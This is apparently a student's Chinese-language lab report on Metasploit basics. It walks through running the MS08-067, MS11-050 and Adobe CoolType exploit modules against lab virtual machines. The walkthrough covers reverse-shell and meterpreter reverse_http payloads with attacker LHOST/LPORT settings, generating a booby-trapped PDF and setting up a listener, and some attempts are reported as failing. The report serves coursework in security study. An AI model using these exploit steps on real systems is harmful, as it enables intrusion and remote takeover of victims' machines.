• 20145339顿珠 Exp5 MSF基础应用


    20145339顿珠 Exp5 MS08_067漏洞测试

    实验过程

    IP地址:192.168.1.104

    虚拟机ip:192.168.1.102

    在控制台内使用search ms08_067查看相关信息。

    使用 show payloads ,确定攻击载荷。

    使用命令 use exploit/windows/smb/ms08_067_netapi,并用 set payload generic/shell_reverse_tcp 选择

    playoad,并查看相关信息

    设置监听ip,监听端口以及攻击Ip

    使用命令exploit发起攻击

    使用ipconfig命令查看

    可查看在windows2k3下新建的文件夹20145339

    最后问题不知道出在哪里?

    20145339 Exp5 MS11_050

    实验过程

      • 使用命令msfconsole命令进入控制台
      • 使用命令search ms11_050查看针对MS11_050漏洞的攻击模块
      • 确定相应模块名之后,我们使用该模块。使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement进入模块
      • 使用命令info查看该模块的具体信息
      • 设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令set payloads windows/meterpreter/reverse_http
      • 使用show options 查看具体参数设置

      • 设置其相关参数

        set LHOST 192.168.1.104 
        set LPORT 5339
        set URIPATH 20145339RX

    20145339顿珠 Exp5 Adobe阅读器漏洞攻击

    实验过程

    • 主机为kali的ip地址为:192.168.1.111、靶机windows xp 的ip地址为:192.168.1.110
    • 使用命令msfconsole进入控制台
    • 根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_cooltype_sing),可以使用info命令查看模块的基本信息,以及参数要求,使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块
    • 设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http
    • 使用命令show options来确定需要修改的参数。需要设置的参数有LHOSTLPORTFILENAME

      set LHOST 192.168.1.111
      set LPORT 5333
      set FILENAME 5333.pdf

    • 使用命令exploit生成5333.pdf

    • 其生成路径,是一个隐藏文件夹,可以打开另一个终端,使用命令cp 5333.pdf /root/5333.pdf将其复制到根目录下

    • 退出并重新进入msf平台

    • 使用命令 use exploit/multi/handler进入监听模式,设置好参数,执行exploit等待被攻击者的接听。

    • 连接失败了。。。。。

  • 相关阅读:
    17点50分系列-如何平静的工作
    Java之简单的聊天工具
    伪分布式环境下命令行正确运行hadoop示例wordcount
    Linux 从 sar 到 sar2html 的认识
    telnet简单操作 模拟请求
    3D跑酷游戏《月影忍者之疾风狂逃》
    [每日一题] OCP1z0-047 :2013-07-24 子查询――外查询与内查询的执行顺序
    思科27亿美元收购网络安全公司Sourcefire
    利用Format函数格式化时间和日期
    HI3531网络tftp、nfs加载 分类: arm-linux-Ubuntu HI3531 2014-01-03 09:11 826人阅读 评论(0) 收藏
  • 原文地址:https://www.cnblogs.com/dj20145339/p/6736130.html
Copyright © 2020-2023  润新知